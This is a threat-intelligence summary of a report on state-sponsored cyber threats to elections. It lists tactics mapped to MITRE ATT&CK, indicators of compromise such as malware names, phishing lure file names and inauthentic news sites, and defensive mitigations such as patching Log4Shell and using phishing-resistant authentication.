Keypoints
- State-sponsored groups (e.g., Russian, Chinese, Iranian actors) are the most persistent and capable threats to election-related targets, often combining intrusion, destructive activity, and information operations.
- The election attack surface extends beyond voting machines and registries to include campaign infrastructure, media, election administrators, and third‑party service providers.
- Adversaries frequently use layered hybrid operations—network intrusion and data theft followed by DDoS, defacement, or public leak campaigns—to amplify impact.
- Observed TTPs include phishing, exploitation of internet‑exposed systems (e.g., Log4Shell), credential harvesting via spoofed domains, web shells, DDoS, wiper malware, and staged information operations (deepfakes, inauthentic news sites).
- Historical incidents: 2014 Ukraine hack/erase/deface operation (CyberBerkut / GRU overlaps), 2020 Iranian-linked voter intimidation and media compromise attempts (Emennet Pasargad), and persistent Russia-Ukraine hybrid campaigns using wipers and Telegram leak channels.
- Mitigations recommended: infrastructure hardening, patching (e.g., against CVE-2021-44228), phishing-resistant account protection (Advanced Protection Program), DDoS defenses (Project Shield), endpoint hardening, and proactive threat hunting.
- Information operations increasingly leverage AI-generated content and fictitious media brands, requiring combined technical and intelligence-driven detection and response.
MITRE Techniques
- [T1566] Phishing – Used to deliver malware and harvest credentials: ‘identify a likely TEMP.Hex phishing operation using a Taiwanese presidential-themed lure to deliver a malicious Microsoft Windows Installer (MSI) file that, when executed, delivered the SOGU.SEC backdoor.’
- [T1190] Exploit Public-Facing Application – Adversaries exploited internet-facing vulnerabilities: ‘exploited the Log4Shell vulnerability (CVE-2021-44228) to compromise a Federal Civilian Executive Branch (FECB) organization in 2022.’
- [T1041] Exfiltration Over C2 Channel – Stolen data used to support influence operations and leaks: ‘sensitive information stolen through a network intrusion boosts the effectiveness of subsequent information operations that can leverage authentic documents.’
- [T1498] Network Denial of Service – DDoS used to disrupt services and undermine trust: ‘DDoS attacks disrupted the websites and some online services of Ukrainian government agencies and financial services organizations shortly before the advancement of Russian troops in February 2022.’
- [T1491] Defacement – Web defacements used for public-facing deception: ‘an attempted defacement of the CEC website with fake election results.’
- [T1485] Data Destruction – Wiper malware deployed to erase systems and telegraph success: ‘threat actors steal data from targeted systems, deploy wiper malware, and then telegraph the success of their operations by calling attention to the disruption and providing evidence of a compromise.’
- [T1078] Valid Accounts – Use of previously compromised accounts to publish or spread false narratives: ‘the actors allegedly attempted to log in to a previously compromised media outlet, likely to use the access to disseminate additional false information.’
Indicators of Compromise
- [Malware] observed samples and backdoors – SOGU.SEC, BROWNSPARK (and references to AIRBREAK and GOLDDRAGON.POWERSHELL in targeted campaigns).
- [File names / Lures] election-themed phishing documents – “Risk Factors on National and Local Elections 2022.docx”, “CSAFP’S_GUIDANCE_RE_NATIONAL_AND_LOCAL_ELECTION_2022_NLE.docx”.
- [Domains / Inauthentic Media] infrastructure used for IO and false attribution – “Times Newswire” and “World Newswire” subdomains and other Haixun‑hosted news sites used by HaiEnergy; leak sites/personas such as DC Leaks / Solntsepek.
- [Vulnerability] exploited public-facing flaw – CVE-2021-44228 (Log4Shell) used by UNC2448 to compromise a FECB organization.
- [Campaign artifacts] staged media/content used in IO – video and purportedly leaked materials (e.g., election-themed videos and alleged leaked documents used by Iranian and PRC-linked campaigns).
Defensive technical guidance distilled from the report focuses on reducing the common attack surfaces and preparing for hybrid campaign patterns. Prioritize patching internet‑facing applications (notably known critical flaws such as CVE‑2021‑44228), deploy web‑application protections and monitoring for web shells, and restrict exposed services to vetted access. Implement strong email defenses and anti‑phishing controls (including URL filtering and attachment sandboxing), deploy multi‑factor and phishing‑resistant authentication for high‑risk accounts, and monitor for credential‑harvesting domains and suspicious login attempts.
Prepare for combined-impact incidents by hardening endpoints and backups against destructive malware (wipers), adopting immutable or offline backups, and establishing rapid restoration procedures. Use DDoS mitigation and content‑distribution protections for public‑facing election services and campaign sites; instrument logging and centralized telemetry to support rapid detection and triage. Hunt for anomalous exfiltration patterns and be ready to trace leaked materials back to initial intrusion vectors to disrupt follow‑on information operations.
Operationalize intelligence-driven defenses: prioritize monitoring and countermeasures for threat actors and TTPs relevant to your region and role, exercise cross‑sector incident coordination, and enroll high‑risk personnel in phishing‑resistant protections (for example, Advanced Protection Program). Combine technical controls (patching, MFA, endpoint hardening, DDoS protection) with proactive threat hunting and media/IO monitoring to reduce the likelihood and impact of hack‑and‑leak and hybrid campaigns.
Read more: https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-global-elections/